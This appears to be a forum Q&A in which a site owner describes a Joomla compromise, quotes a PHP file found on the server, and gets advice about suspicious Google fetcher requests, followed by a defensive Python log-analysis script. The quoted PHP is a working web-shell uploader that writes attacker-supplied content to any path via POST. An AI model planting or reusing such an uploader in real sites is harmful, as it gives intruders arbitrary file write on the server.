0

My server was recently compromised due to Joomla and allow_url_fopen = ON. I see various PHP files in my server root with this content in them:

Restricted accoss
<?php
error_reporting(0); 
ini_set("max_execution_time",0); 
ini_set("default_socket_timeout", 2); 
ob_implicit_flush (1); 
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

So I closed allow_url_fopen and deleted all of these files. Now my site runs fine for a few minutes, but it makes requests every few seconds to this address, giving this message in error_log:

[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml

I see this in access_log lots of times:

74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)"; 

So is it normal?

Assad Ullah

1 Answer

3

Looks like someone's abusing Google App Engine. Check your Apache access log for that IP address, and the user agent string should have their app ID. You can then report the abuse to Google.

Michael Hampton
  • I see this in access_log lots of times, but I didn't see any app ID in it: 74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" – Assad Ullah Mar 07 '13 at 01:59
  • That should be added to your question, not posted as a comment. – Michael Hampton Mar 07 '13 at 09:58
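
One way to run the access-log check suggested in the answer, as an added example (not code from the question or the answer): it groups requests for /index.xml by client and user agent, extracts an App Engine "appid:" token when the user agent carries one, and lists successful POSTs to .php files, which is how an uploader like the one in the question is driven. Only the Feedfetcher entry comes from the page; the other log lines, the app ID and the .php path are constructed placeholders.

```python
import re
from collections import Counter

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# App Engine's URL Fetch service appends "appid: <id>" to the outgoing User-Agent.
APPID_RE = re.compile(r"appid:\s*([^\s;)]+)")

# Constructed sample: the first entry is the one quoted on the page; the rest are
# invented for illustration (documentation IPs, placeholder app ID and path).
SAMPLE_LOG = [
    '74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" '
    '"Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"',
    '192.0.2.10 - - [07/Mar/2013:00:16:02 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" '
    '"AppEngine-Google; (+http://code.google.com/appengine; appid: s~example-app-id)"',
    '198.51.100.7 - - [07/Mar/2013:00:16:40 +0000] "POST /images/example.php HTTP/1.1" 200 2 "-" "-"',
    'not an access log line',
]

def parse(lines):
    """Yield a dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def fetchers(lines, path="/index.xml"):
    """Count requests for `path`, keyed by (client IP, fetcher kind, app ID or None)."""
    hits = Counter()
    for e in parse(lines):
        if e["path"].split("?")[0] != path:
            continue
        appid = APPID_RE.search(e["agent"])
        is_feed = "Feedfetcher-Google" in e["agent"]
        kind = "appengine" if appid else "feedfetcher" if is_feed else "other"
        hits[(e["ip"], kind, appid.group(1) if appid else None)] += 1
    return hits

def php_posts(lines):
    """Successful POSTs to .php files, as (client IP, path) pairs."""
    return [(e["ip"], e["path"]) for e in parse(lines)
            if e["method"] == "POST" and e["status"].startswith("2")
            and e["path"].split("?")[0].lower().endswith(".php")]

if __name__ == "__main__":
    print(dict(fetchers(SAMPLE_LOG)), php_posts(SAMPLE_LOG))
```

Against a real log, pass the open file object instead of SAMPLE_LOG; any .php path returned by php_posts that is not part of the Joomla installation is worth inspecting on disk.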